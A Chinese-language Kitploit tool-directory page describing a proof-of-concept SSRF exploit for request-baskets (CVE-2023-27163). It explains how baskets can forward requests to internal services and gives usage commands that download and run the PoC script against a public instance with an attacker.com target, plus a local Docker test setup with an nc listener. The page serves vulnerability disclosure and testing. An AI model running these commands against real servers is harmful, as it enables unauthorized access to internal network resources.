Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-27163 — 针对 request-baskets(<= v.1.2.1)的服务器端请求伪造(SSRF)概念验证 | Kitploit
工具/GitHubGitHub/entr0pie/cve-2023-27163
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubentr0pie/cve-2023-27163

CVE-2023-27163

针对 request-baskets(<= v.1.2.1)的服务器端请求伪造(SSRF)概念验证

查看仓库
31543年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

Request-Baskets(CVE-2023-27163)SSRF 漏洞的 PoC

本仓库包含针对 CVE-2023-27163 的概念验证(PoC)代码。该漏洞是 request-baskets 在 1.2.1 版本及之前版本中发现的一个服务端请求伪造(SSRF)漏洞。攻击者可利用特制的 API 请求,通过 /api/baskets/{name} 组件访问网络资源和敏感信息。

感谢 @b33t1e、@chelinboo147 和 @houqinsheng(参见 文章)。

使用方法

wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
bash ./CVE-2023-27163.sh https://rbaskets.in/ http://attacker.com/

它是如何工作的?

Request-baskets 是一个 Web 应用程序,用于在特定路由(即所谓的 basket)上收集和登记请求。在创建 basket 时,用户可以指定另一台服务器来转发请求。问题在于,用户可以指定非预期的服务,例如网络隔离的应用程序。

例如:假设服务器上托管着 Request-baskets(端口 55555)和一个运行在 8000 端口的 Flask Web 服务器。该 Flask 服务器还被配置为仅与 localhost 交互。通过创建一个转发到 http://localhost:8000 的 basket,攻击者就可以访问之前受限制的 Flask Web 服务器。

在本地进行测试

PoC 示意图

  1. 启动 Request-Baskets 的 Docker 容器
docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
  1. 下载 PoC
wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
  1. 等待连接
nc -lvp 8000
  1. 保存 Docker 主机的 IP 地址
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
  1. 运行 PoC
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/

许可证

本项目采用 Unlicense 许可证。

下载工具